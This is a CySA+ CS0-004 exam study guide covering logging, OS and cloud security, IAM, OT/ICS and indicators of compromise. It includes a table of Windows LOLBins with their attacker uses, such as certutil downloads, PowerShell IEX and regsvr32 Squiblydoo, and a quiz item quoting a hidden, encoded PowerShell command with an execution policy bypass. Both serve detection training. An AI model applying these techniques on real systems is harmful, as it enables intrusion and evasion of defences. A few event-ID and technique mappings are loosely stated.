What percentage of the CySA+ CS0-004 exam is Security Operations?

Security Operations is the largest domain at 34% of the CS0-004 exam, representing approximately 29 of the 85 questions. It is split into two study pages: Architecture & Detection (this page) and Tools, Threat Intel & AI (page 2).

What are LOLBins and why are they tested on CySA+?

LOLBins (Living off the Land Binaries) are legitimate Windows/OS tools abused by attackers to evade detection. Key examples tested on CySA+ include certutil, PowerShell, wscript, mshta, regsvr32, rundll32, and bitsadmin. Attackers use them to download payloads, execute code, or establish persistence because they bypass application allowlisting.

How does ZTNA differ from traditional VPN on the CySA+ exam?

Traditional VPN grants broad network access after authentication. ZTNA (Zero Trust Network Access) enforces continuous verification, grants least-privilege access per application, and assumes breach. ZTNA is identity and context-aware, supports micro-segmentation, and does not expose the network. SASE (Secure Access Service Edge) is the broader cloud-delivered framework that incorporates ZTNA.

What Windows Event IDs should I know for the CySA+ CS0-004 exam?

Key Windows Event IDs for CySA+: 4624 (successful logon), 4625 (failed logon), 4648 (logon with explicit credentials), 4688 (process creation), 4698 (scheduled task created), 4720 (user account created), 4732 (user added to privileged group), 7045 (new service installed), 4663 (object access), 4771 (Kerberos pre-auth failure).

CompTIA CySA+ CS0-004: Security Operations Architecture & Detection Study Guide (Page 1 of 5)

Q: What is impossible travel and how is it detected?

Impossible travel is an identity-based indicator where the same user account authenticates from two geographically distant locations within a timeframe that makes physical travel impossible. It is detected via authentication logs comparing source IP geolocation timestamps. It can indicate credential theft, VPN usage, or account compromise.

Domain Overview

Security Operations is the largest CySA+ CS0-004 domain — 34% of the exam across two study pages.

What This Page Covers

This page covers the foundational sub-domains of Security Operations: security architecture, logging & monitoring, OS security concepts, cloud/container infrastructure, identity & access management, encryption, OT/ICS basics, and indicators of malicious activity. This is the "detection foundation" half of the domain — the tools and threat intel half is on Page 2.

Logging & Monitoring OS Security Cloud & Containers IAM / PAM OT/ICS/SCADA Malicious Activity Indicators

🏗️ Architecture & Logging

Log ingestion, integrity, and retention
NTP synchronization for correlation
Windows, Linux, and cloud log sources
Centralized vs. distributed logging

💻 OS & Infrastructure

OS hardening and critical files
LOLBins — living off the land binaries
Virtualization, containers, APIs
ZTNA and SASE architectures

🔑 IAM, PAM & Encryption

PAM, RBAC, ABAC, secrets management
MFA types and bypass techniques
TLS, PKI, data at rest vs. in transit
Key management and certificate lifecycle

🚨 Indicators & Detection

Network, host, application, cloud IOCs
Identity indicators — impossible travel
BEC detection — email rule changes
OT/ICS protocol anomalies

💡 Exam tip: Security Operations (34%) is split across Pages 1 and 2. Expect questions to blend architecture knowledge with indicator identification — e.g., "Given this log excerpt, what type of malicious activity is occurring?"

Key Concepts

Eight expandable sections covering every exam-tested topic in this domain.

KEYLogging & Monitoring Architecture▼

Log ingestion — Logs must be collected from all relevant sources: endpoints, network devices, cloud services, applications, identity providers. A gap in ingestion = a blind spot.

NTP synchronization: All log sources must use synchronized time. Without NTP, timestamps are skewed and event correlation becomes unreliable or impossible. This is a classic exam topic — "why can't I correlate logs?" → NTP.
Log integrity & security: Logs must be protected from tampering. Write-once storage, digital signatures, and forwarding logs off the compromised host are key mechanisms.
Retention policies: Compliance requirements (PCI DSS = 12 months, HIPAA = 6 years) drive retention duration. Short retention = lost forensic evidence.
Log sources by category: Windows Event Logs (Security, System, Application), Syslog (Linux/network), auditd (Linux process/file auditing), cloud-native logs (CloudTrail, Azure Monitor, GCP Cloud Logging), application logs, identity provider logs (Okta, AD).
Log forwarding: Syslog (UDP 514, TCP 514, TLS 6514), Beats/Elastic agents, Windows Event Forwarding (WEF) to Windows Event Collector (WEC).
Centralized logging benefits: Single pane of glass, cross-source correlation, tamper resistance, compliance documentation.

⏰ NTP is always the answer when log correlation fails. Expect 1–2 questions on this.

HOTOS Security Concepts & LOLBins▼

OS hardening — Reducing attack surface by removing unnecessary services, applying security baselines (CIS Benchmarks), and configuring security settings.

Critical Windows files: SAM database (credential hashes), NTDS.dit (AD database), registry hives (SOFTWARE, SYSTEM, SAM), event logs (.evtx), prefetch files (execution evidence).
Critical Linux files: /etc/passwd (user accounts), /etc/shadow (password hashes), /etc/sudoers (privilege escalation), /var/log/auth.log, /var/log/syslog, /proc/ (process information), crontab files.
LOLBins (Living off the Land Binaries): Legitimate OS tools abused by attackers to blend in with normal traffic and evade signature-based detection.

LOLBin	Malicious Use	Detection Signal
`certutil.exe`	Download files, decode Base64, decode malware	Unusual network connections from certutil
`PowerShell`	Download+execute (IEX), encoded commands (-EncodedCommand), bypass execution policy	Encoded PS commands, AMSI bypass attempts
`wscript/cscript`	Execute .vbs/.js malware scripts	Script execution from temp dirs
`mshta.exe`	Execute malicious HTA files, run inline VBScript/JavaScript	mshta spawning child processes
`regsvr32.exe`	Squiblydoo attack — register remote .sct files via /i: flag	regsvr32 with network URLs
`rundll32.exe`	Execute malicious DLLs, load JavaScript via scrobj.dll	rundll32 calling unusual exports
`bitsadmin`	Download files, maintain persistence via BITS jobs	BITS jobs to external IPs

⚠️ LOLBins bypass application allowlisting because the binary itself is trusted. Detection relies on behavioral analysis — looking at what the process does (spawns child, connects to external IP) rather than what the process is.

KEYCloud, Virtualization & Container Infrastructure▼

Cloud-native security: Shared responsibility model — provider secures the cloud infrastructure; customer secures data, identities, workloads, and configurations.
Virtualization: Hypervisor (Type 1: bare-metal, e.g., VMware ESXi; Type 2: hosted, e.g., VirtualBox). VM escape attacks — malware breakout from VM to hypervisor. VM isolation is critical.
Containers (Docker/Kubernetes): Share the host OS kernel — lighter than VMs but smaller isolation boundary. Container security concerns: image vulnerabilities (scan with Trivy), privilege escalation via --privileged flag, lack of network policies, secrets in environment variables.
Kubernetes security: RBAC for pod access, Network Policies for pod-to-pod traffic control, Pod Security Standards, secrets management (Vault), admission controllers.
API security: Authentication (API keys, OAuth 2.0, JWT), rate limiting, input validation, logging API calls, WAF for API endpoints.
ZTNA (Zero Trust Network Access): Verify identity + device posture before granting least-privilege app access. Never grant broad network access. Continuous verification, not trust-once.
SASE (Secure Access Service Edge): Cloud-delivered framework combining SD-WAN + security services (ZTNA, CASB, SWG, FWaaS). Key distinction: SASE is the framework; ZTNA is one component.
Micro-segmentation: Granular network controls at the workload level, limiting lateral movement. Replaces traditional VLAN-based segmentation.

📌 Exam distinction: ZTNA is a technology/approach. SASE is a broader architectural framework delivered from the cloud. Know which is which.

KEYIdentity & Access Management (IAM / PAM)▼

PAM (Privileged Access Management): Controls, monitors, and audits access to privileged accounts (admin/root). Components: privileged account vaulting, just-in-time (JIT) access, session recording, password rotation.
Authentication methods: Something you know (password), something you have (token/smart card), something you are (biometric). MFA = two or more factors.
MFA bypass techniques (for detection): MFA fatigue attacks (flood user with push notifications), SIM swapping, OTP phishing (adversary-in-the-middle proxy), social engineering the helpdesk.
RBAC vs. ABAC: RBAC assigns permissions by role. ABAC uses attributes (user dept, time of day, device posture, location) for finer-grained control.
Secrets management: API keys, certificates, and credentials should be stored in secrets managers (HashiCorp Vault, AWS Secrets Manager), not hardcoded or in env files.
Federation & SSO: SAML 2.0 (XML-based, enterprise SSO), OAuth 2.0 (authorization delegation), OpenID Connect (authentication layer on OAuth). Know that SAML is assertion-based.
Least privilege principle: Grant only the minimum access required for the job function. Regularly review and revoke unused permissions.

Encryption & Data Protection▼

TLS (Transport Layer Security): Encrypts data in transit. TLS 1.2 and 1.3 are current standards; TLS 1.0/1.1 and SSL are deprecated. TLS 1.3 removes legacy cipher suites and enforces perfect forward secrecy.
PKI (Public Key Infrastructure): CA hierarchy (Root CA → Intermediate CA → Leaf cert), certificate lifecycle (issuance, renewal, revocation), CRL and OCSP for revocation checking.
Data at rest vs. in transit: At rest: AES-256, BitLocker, LUKS. In transit: TLS, IPsec. Data at rest encryption protects against physical theft of drives.
Key management: HSMs (Hardware Security Modules) for storing root keys. Key rotation, key escrow (for recovery), key destruction when no longer needed.
Hashing vs. encryption: Hashing is one-way (SHA-256, SHA-3) — used for integrity verification, password storage (bcrypt, Argon2). Encryption is reversible — used for confidentiality.
Certificate pinning: Application validates the specific certificate or public key, preventing MITM even with rogue CA. Used in mobile apps.

KEYOT/ICS/SCADA Security Basics▼

OT (Operational Technology) environments control physical processes — power grids, manufacturing, water treatment. They have unique security challenges compared to IT.

Purdue Model (ICS Reference Architecture): 5 levels — Level 0 (physical process/sensors), Level 1 (PLC/RTU controllers), Level 2 (SCADA/DCS supervisory), Level 3 (site operations), Level 4 (enterprise IT). The DMZ sits between Level 3 and Level 4.
Key OT protocols: Modbus (oldest, no authentication), DNP3 (utilities/SCADA), BACnet (building automation), EtherNet/IP, Profinet. Most lack native encryption or authentication.
OT vs. IT security priorities: IT prioritizes CIA (Confidentiality-Integrity-Availability). OT prioritizes AIC — Availability first, then Integrity, then Confidentiality. Downtime = physical damage or safety risks.
Patching challenges: OT systems often can't be patched or rebooted — compensating controls (network segmentation, monitoring) are used instead.
Air gaps: Physical or logical separation between OT and IT/Internet networks. Air gaps can be bridged by USB drives, compromised jump hosts, or wireless access points.
ICS-specific attacks: Stuxnet (PLC reprogramming), TRITON/TRISIS (safety instrumented systems), Ukraine power grid attacks (BlackEnergy/Industroyer).

⚠️ On the exam: if an OT/ICS question asks about priorities, remember Availability comes first in OT environments, unlike standard IT.

HOTNetwork & Host Indicators of Malicious Activity▼

Indicators of compromise (IOCs) are artifacts that suggest a security incident. The CS0-004 exam tests identification of indicators from log excerpts and scenarios.

Network indicators: Rogue/unauthorized devices on network, unexpected open ports, unusual DNS queries (long subdomain strings = DNS tunneling), beaconing (regular outbound connections = C2), large outbound data transfers (exfiltration), port scanning (sequential connection attempts), unusual protocols on well-known ports.
Host indicators: Unexpected CPU/memory spikes, unauthorized software installations, new scheduled tasks or services, modifications to critical files (/etc/passwd, SAM), evidence of LOLBin abuse, files in unusual directories (temp, user profiles), prefetch evidence of tools that shouldn't run.
Application indicators: Unusual API calls, authentication from unexpected geographic locations, access to sensitive data outside normal hours, excessive failed logins followed by success (credential stuffing), unusual database queries (SQL injection indicators).
Cloud indicators: API calls to services never previously accessed, unusual data egress to external storage, IAM permission changes, new admin accounts created, CloudTrail disabled, security group rules opened to 0.0.0.0/0.
Social engineering indicators: Typosquatting domains (paypa1.com), shortened URLs masking malicious destinations, lookalike email domains (companyname-security.com).

✅ Study tip: Practice log analysis exercises. The exam presents log excerpts and asks you to identify the attack type. Know what each indicator looks like in raw log data.

HOTIdentity-Based Indicators & BEC▼

Impossible travel: Same account logs in from two geographically distant locations within a timeframe that makes physical travel impossible. Example: Login from London at 08:00, login from Singapore at 08:15. Indicates credential theft, not legitimate user. Note: VPN/proxy usage can create false positives.
Unauthorized access patterns: Access to data or systems outside the user's normal role, access at unusual hours, access to data immediately before resignation.
Account creation anomalies: New admin accounts created without change management tickets, accounts created outside business hours, service accounts with interactive logon rights.
BEC (Business Email Compromise): Attacker compromises a legitimate business email account (vs. spoofing in phishing). BEC indicators:
- New email forwarding rules to external addresses
- Inbox rules deleting security alerts or sent items
- Login from new device/location followed by rule creation
- Mass email sending from compromised account
- Changes to payment details or wire transfer requests
Distinction: BEC uses a compromised legitimate account. Phishing uses a spoofed or lookalike domain. BEC is harder to detect because the emails come from a real, trusted address.

🚨 BEC is explicitly tested on CS0-004. Know the difference between BEC (compromised account + inbox rule changes) and phishing (fake domain + lure email).

Study Checklist

Click items to mark them complete. Track your progress across all key topics.

0 of 18 complete

LoggingExplain why NTP synchronization is critical for log correlation in a SIEM

LoggingName at least 5 log sources and which security events each captures

LoggingUnderstand log integrity mechanisms (write-once, off-host forwarding, digital signatures)

OSIdentify the 7 most commonly abused LOLBins and their malicious use cases

OSKnow critical Windows and Linux files that attackers target or modify

CloudExplain the shared responsibility model and what the customer is responsible for

CloudDescribe container security risks vs. VM isolation differences

CloudDifferentiate ZTNA from SASE — know which is a component of the other

IAMDefine PAM and its four core capabilities (vaulting, JIT, session recording, rotation)

IAMKnow three MFA bypass techniques attackers use and how to detect them

IAMDifferentiate SAML, OAuth 2.0, and OpenID Connect by use case

OT/ICSDescribe the Purdue Model's 5 levels and where the DMZ sits

OT/ICSExplain why OT prioritizes Availability over Confidentiality (AIC vs. CIA)

OT/ICSKnow the key OT protocols: Modbus, DNP3, BACnet — and their security weaknesses

DetectIdentify network, host, application, and cloud indicators from a log excerpt

DetectDefine impossible travel and explain when it produces false positives

DetectList the 5 specific BEC indicators distinguishing it from phishing

DetectDescribe DNS tunneling characteristics detectable in log data

Reference Tables

Quick-reference data for exam preparation and last-minute review.

Key Windows Event IDs

Event ID	Event Name	Security Relevance
4624	Successful Logon	Baseline; watch for logon type 3 (network) or type 10 (remote interactive)
4625	Failed Logon	Multiple failures = brute force or password spray
4648	Logon with Explicit Credentials	Indicator of pass-the-hash or lateral movement
4688	Process Creation	Critical for detecting LOLBin abuse, malware execution
4698	Scheduled Task Created	Common persistence mechanism — watch for tasks created outside change windows
4720	User Account Created	Unauthorized account creation = potential backdoor
4732	User Added to Privileged Group	Privilege escalation indicator
4663	Object Access	Access to sensitive files/directories
4771	Kerberos Pre-Auth Failed	AS-REP Roasting or Kerberoasting attempts
7045	New Service Installed	Malware persistence via Windows services

Cloud Logging Services by Provider

Provider	Audit/Activity Log	Network Log	Resource Log
AWS	CloudTrail	VPC Flow Logs	CloudWatch Logs
Azure	Azure Activity Log	NSG Flow Logs	Azure Monitor / Log Analytics
GCP	Cloud Audit Logs	VPC Flow Logs	Cloud Logging (formerly Stackdriver)

OT/ICS Protocol Reference

Protocol	Primary Use	Port	Security Weakness
Modbus	PLC communications, manufacturing	TCP 502	No authentication, no encryption, commands accepted from any source
DNP3	SCADA for utilities (power, water)	TCP/UDP 20000	Weak authentication (SAv5 adds some), replay attacks possible
BACnet	Building automation (HVAC, access)	UDP 47808	No encryption; BACnet/IP exposed on IT networks creates risk
EtherNet/IP	Industrial Ethernet (Rockwell/Allen-Bradley)	TCP 44818	Authentication optional; vulnerable to replay/MITM
Profinet	Industrial Ethernet (Siemens)	Multiple	Device discovery broadcasts; limited access control

Indicator Type Quick Reference

Indicator	Type	What to Look For in Logs
Impossible travel	Identity	Same user, two auth events, geographically impossible timeframe
BEC inbox rule	Application	New email rule forwarding to external; rule created shortly after new-location login
DNS tunneling	Network	Unusually long subdomain strings; high-frequency DNS queries to same domain
C2 beaconing	Network	Regular outbound connections at fixed intervals to same external IP
LOLBin abuse	Host	certutil/powershell spawning cmd.exe or making external connections
Data exfiltration	Network	Large outbound transfers, especially off-hours; unusual destination IPs

Practice Quiz

6 scenario-based questions aligned to CS0-004 exam style.

Question 1 of 6

A SOC analyst is trying to correlate events from a firewall, Windows Active Directory, and a cloud SIEM. The events appear to occur in the right order individually, but the timestamps across sources are inconsistent by 10–30 minutes, making timeline reconstruction unreliable. What is the most likely root cause?

1 / 6

Question 2 of 6

During a threat hunt, an analyst finds this PowerShell command in process creation logs (Event ID 4688): powershell -EncodedCommand [long Base64 string] -ExecutionPolicy Bypass -WindowStyle Hidden. Which category of malicious activity does this represent?

2 / 6

Question 3 of 6

An identity threat alert triggers for a user account showing a successful authentication from Toronto, Canada at 09:00 AM, followed by another successful authentication from Seoul, South Korea at 09:45 AM. No VPN usage is recorded for this account. What is this indicator called, and what does it most likely indicate?

3 / 6

Question 4 of 6

A security operations team reviews email gateway logs and discovers that three C-suite accounts have new inbox rules created in the last 48 hours — all forwarding a copy of every received email to an external Gmail address. These accounts also show successful logins from a previously unseen country two days ago. What type of attack is most consistent with these findings?

4 / 6

Question 5 of 6

An organization is implementing remote access for employees and wants to replace their legacy VPN with an architecture that provides application-level access controls, enforces device posture checks, and operates on a "never trust, always verify" principle. Which solution best meets these requirements?

5 / 6

Question 6 of 6

A security analyst is assessing a manufacturing facility that uses SCADA systems to control assembly line equipment. The OT team reports that several PLCs are running firmware from 2018 and cannot be patched without a full production shutdown, which is unacceptable to the business. What is the MOST appropriate compensating control?

6 / 6

Study Plan

A focused 4-week plan for mastering Security Operations Architecture & Detection.

Week 1 — Logging Architecture & OS Security (Days 1–7)

Map all log sources in a sample environment: Windows DC, Linux server, firewall, cloud account
Configure a free SIEM (Splunk Free, Elastic/ELK) and ingest logs from at least 3 sources
Test what happens when NTP is misconfigured — observe timestamp drift in correlation
Memorize the 10 key Windows Event IDs from the reference table
Write out all 7 LOLBins with their malicious use cases from memory — quiz yourself

Week 2 — Cloud, Container & Identity Security (Days 8–14)

Build a free-tier AWS or Azure account and enable CloudTrail/Activity Log — review what it captures
Run a Docker container and test the difference between normal and --privileged mode
Lab: set up RBAC vs ABAC policies and compare access behavior
Research 3 real-world MFA bypass incidents and document how each was detected
ZTNA vs SASE: draw a diagram showing ZTNA as a component within SASE

Week 3 — OT/ICS & Indicator Analysis (Days 15–21)

Draw the Purdue Model from memory, labeling all 5 levels and the IT/OT DMZ
Research the Stuxnet and TRITON attacks — understand what indicators they left
Practice log analysis: use Blue Team Labs Online or Splunk BOTS for indicator identification exercises
Identify impossible travel scenarios: practice calculating whether travel is physically possible given two timestamps and locations
Write BEC vs. phishing indicator comparison table from memory

Week 4 — Review, Practice Questions & Weak Areas (Days 22–28)

Take two full practice exams (CompTIA CertMaster Practice, Jason Dion, etc.)
For every question missed, trace back to the specific concept and re-study it
Focus extra time on any topic scoring below 70% in practice
Review the official CS0-004 exam objectives PDF — check every task statement
Do a final run through the checklist on this page — should be 100% complete

Common Exam Mistakes

5 mistakes that cost candidates points — know these before exam day.

1

Confusing ZTNA with SASE

Treating them as the same thing — or choosing SASE when the question asks about access control

What Goes WrongWhen a question asks "which technology enforces per-application access control with continuous verification," candidates incorrectly select SASE. SASE is the framework; ZTNA is the specific access control technology within it.

The FixZTNA = the specific access technology (replaces VPN, per-app access, continuous verification). SASE = the cloud-delivered framework that bundles ZTNA + SD-WAN + CASB + SWG + FWaaS. If the question is about access control → ZTNA. If it's about the full cloud security architecture → SASE.

Prevention habit: Draw a Venn diagram with SASE as the outer circle containing ZTNA as one component inside it. Visualize it until automatic.

2

Missing NTP as the Answer to Log Correlation Problems

Choosing SIEM misconfiguration when the real issue is clock synchronization

What Goes WrongWhen presented with a log correlation failure, candidates jump to "the SIEM parser is wrong" or "the log format doesn't match." But the most commonly tested cause is timestamp inconsistency due to NTP not being configured across all log sources.

The FixWhenever a scenario describes an inability to correlate events across multiple log sources — especially when timestamps seem "off" — think NTP first. Log format/parsing issues produce different symptoms (missing fields, parsing errors) rather than time-shifted events.

Prevention habit: NTP is "free points" if you remember it. Add it to your exam trigger list: "log correlation problem" → NTP.

3

Confusing BEC with Phishing

Missing that BEC uses legitimate compromised accounts, not spoofed/lookalike domains

What Goes WrongBEC scenarios include indicators like new inbox forwarding rules, logins from foreign IPs, and unusual sending behavior. Candidates misidentify this as phishing because "email attack." Phishing uses fake domains; BEC uses the real account.

The FixBEC trigger words: forwarding rule to external address, inbox rule deleting sent items, login from new country + rule creation shortly after, wire transfer request from "real" exec email. If the email came from the legitimate domain and the account was recently logged into from an unusual location → BEC.

Prevention habit: BEC = "compromised account + stealth rules." Phishing = "fake domain + lure email." Memorize the distinction.

4

Getting OT/ICS Priority Order Wrong

Applying IT's CIA triad instead of OT's AIC priority order

What Goes WrongCandidates default to CIA (Confidentiality first) when answering OT/ICS security questions. In OT environments, Availability is the top priority — a downed power grid or stopped assembly line has immediate physical consequences. Selecting confidentiality-focused controls for an ICS question will always be wrong.

The FixOT = AIC (Availability → Integrity → Confidentiality). IT = CIA. When you see "SCADA," "PLC," "manufacturing," "utility," or "operational technology" in a question, switch to AIC mentally. Compensating controls over patching (preserves availability) is the right OT answer.

Prevention habit: "OT = AIC, IT = CIA" — write it on a sticky note. This comes up every exam.

5

Choosing SASE When Specific Access Control Is Asked

Over-engineering the answer by selecting the full framework vs. the specific component

What Goes WrongWhen a question asks "what replaces VPN for zero trust remote access," candidates choose SASE because it sounds comprehensive. But SASE is the delivery architecture; the specific remote access replacement technology is ZTNA.

The FixMap each answer to its scope: VPN replacement + zero trust + per-app access = ZTNA. Cloud-delivered network + security stack = SASE. Email security = SEG. Web proxy + URL filtering = SWG. Know where each fits within SASE.

Prevention habit: When answering technology questions, ask: "Is this asking about a specific control (ZTNA) or the overall architecture (SASE)?" The question stem usually tells you.

Frequently Asked Questions

Top questions from CySA+ CS0-004 candidates preparing for this domain.

How much of the CS0-004 exam does Security Operations cover? ▼

Security Operations is the largest domain at 34% (~29 questions). It covers architecture, logging, indicators, tools, threat intel, and AI. We split it across two study pages: this page covers architecture and detection; Page 2 covers tools, threat hunting, and AI in security ops.

What are the most commonly tested LOLBins on CySA+? ▼

The most tested LOLBins are: certutil (file download/decode), PowerShell (download-cradles, encoded commands), wscript/cscript (VBScript execution), mshta (HTA file execution), regsvr32 (Squiblydoo technique), rundll32 (DLL side-loading), and bitsadmin (background file transfer for C2). Know each binary's malicious use case and the detection signal it produces in logs.

What does "impossible travel" mean, and when does it produce false positives? ▼

Impossible travel is when a user account authenticates from two geographically distant locations within a timeframe that makes physical travel impossible. It's a strong indicator of compromised credentials. False positives occur when the user is legitimately using a VPN exit node in another country, is traveling via private jet (faster than commercial estimates), or when GeoIP databases misclassify IP addresses. Always validate against VPN logs before escalating.

What Windows Event IDs are most important to memorize for CS0-004? ▼

Prioritize these: 4624 (successful logon), 4625 (failed logon), 4688 (process creation — essential for LOLBin detection), 4698 (scheduled task created — persistence), 4720 (user account created), 4732 (added to privileged group), 7045 (new service installed). Bonus: 4771 (Kerberos pre-auth failed — Kerberoasting) and 4663 (object access). The Reference tab on this page has the full table.

How should I explain the difference between ZTNA and SASE to answer exam questions correctly? ▼

ZTNA is a specific access control approach: it replaces VPN by granting least-privilege, per-application access based on verified identity and device posture, with no broad network exposure. SASE (Secure Access Service Edge) is a broader cloud-delivered architecture that bundles ZTNA, SD-WAN, CASB, SWG, and FWaaS into a single service. Think of ZTNA as one module inside the SASE package. If a question asks what replaces VPN for zero trust remote access → ZTNA.

Why does OT/ICS prioritize availability over confidentiality? ▼

OT systems control physical processes — power grids, assembly lines, water treatment. An outage or disruption can cause physical damage, safety hazards, or loss of life. Confidentiality of sensor readings matters far less than keeping the process running safely. This is why OT uses AIC order (Availability → Integrity → Confidentiality) instead of IT's CIA order. On the exam, any OT scenario asking about security priorities should lead you toward availability-preserving answers.

What is the difference between BEC and phishing? ▼

Phishing uses spoofed or lookalike email domains to trick users into clicking malicious links or providing credentials — the email comes from a fake address. BEC (Business Email Compromise) occurs after a legitimate business email account has already been compromised. The attacker uses the real account to send emails, create inbox forwarding rules, and gather intelligence. BEC is harder to detect because the emails pass SPF/DKIM/DMARC checks and originate from a trusted domain.

Is the CS0-004 exam harder than CS0-003? ▼

CS0-004 adds significant new material compared to CS0-003: AI in security operations (risks, governance, use cases), expanded cloud-native and container security, stronger emphasis on ZTNA/SASE, and updated threat intel content. The Security Operations domain increased in weight (34% vs. lower in 003). Candidates transitioning from CS0-003 study materials should supplement with AI/ML security concepts and updated cloud security content to be fully prepared for CS0-004.

CompTIA CySA+ CS0-004 — Security Operations: Architecture & Detection